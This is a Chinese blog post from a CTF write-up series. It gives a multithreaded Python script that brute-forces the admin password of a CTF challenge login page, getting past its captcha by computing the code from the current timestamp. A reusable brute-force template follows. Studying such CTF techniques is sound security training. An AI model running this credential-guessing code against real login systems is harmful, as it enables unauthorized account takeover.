Python多线程|爬虫、爆破密码提升效率

最新推荐文章于 2024-04-07 11:11:34 发布

tempulcc

最新推荐文章于 2024-04-07 11:11:34 发布

阅读量1.4k

点赞数 3

分类专栏： Python实战

本文链接：https://blog.csdn.net/tempulcc/article/details/108323499

版权

Python实战专栏收录该内容

10 篇文章 1 订阅

订阅专栏

Python 验证码 crunch|狼组CTF题有验证码后台账号密码爆破(续)

import threading
import time
import queue
import requests
import sys,os


class brutepwd(threading.Thread):
    def __init__(self,q,ss):
        threading.Thread.__init__(self)
        self.__queue=q
        self.__session=ss

    def run(self):
        while not self.__queue.empty():
            pwd=self.__queue.get()
            ss=self.__session
            self.brute(pwd,ss)

    def brute(self,pwd,session):
        loginurl='http://web.t.ctf.wgpsec.org/notjustweb/7b6ca699/login.html'
        vscodeurl='http://web.t.ctf.wgpsec.org/notjustweb/7b6ca699/verifycode.php'
        # proxies={'http':'http://127.0.0.1:5080','https':'https://127.0.0.1:5080'}
        headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3722.400 QQBrowser/10.5.3739.400'}
        url="http://web.t.ctf.wgpsec.org/notjustweb/7b6ca699/login.php"
        vscode=' '
        time.sleep(1)
        data={'username':'admin','password':pwd,'verifycode':vscode,'submit':''}
        res=session.post(url=url,headers=headers,data=data,timeout=10)
        result="password is %s,length is %s" %(pwd,str(len(res.content)))
        while len(res.content)==75:
            ssres2 = session.get(vscodeurl)
            s = int(time.time())
            vscode = str(s)[5:10]
            data = {'username': 'admin', 'password': pwd, 'verifycode': vscode, 'submit': ''}
            res = session.post(url=url, headers=headers, data=data, timeout=10)
            result = "password is %s,length is %s \n" % (pwd, str(len(res.content)))
            # sys.stdout.write(result)
            
        if len(res.content)!=84:
            sys.stdout.write('password is:'+result)
            os._exit(0)
        sys.stdout.write(result)
        ssres2 = session.get(vscodeurl)
        s = int(time.time())
        vscode = str(s)[5:10]

def main():
    threads=[]
    thread_num=5
    q=queue.Queue()
    ss = requests.session()

    with open(r'test.txt', 'r') as f:
        password = f.readlines()
        for pwd in password:
            pwd = pwd.strip('\n')
            q.put(pwd)

    for t in range(thread_num):
        t=brutepwd(q,ss)
        threads.append(t)

    for i in threads:
        i.start()

    for i in threads:
        i.join()

if __name__=="__main__":
    main()

通过改写threading模块的run方法，结合队列特性，不用加锁实现多线程爆破
请勿用于非法用途！

固定模板：

import threading
import queue
import sys,os

class brutepwd(threading.Thread):
    def __init__(self,q):
        threading.Thread.__init__(self)
        self.__queue=q

    def run(self):
        while not self.__queue.empty():
            pwd=self.__queue.get()
            self.brute(args)

    def brute(self,args):
    	xxxx

def main():
    threads=[]
    thread_num=5
    q=queue.Queue()

    with open(r'test.txt', 'r') as f:
        password = f.readlines()
        for pwd in password:
            pwd = pwd.strip('\n')
            q.put(pwd)
  
    for t in range(thread_num):
        t=brutepwd(q)
        threads.append(t)

    for i in threads:
        i.start()

    for i in threads:
        i.join()

if __name__=="__main__":
    main()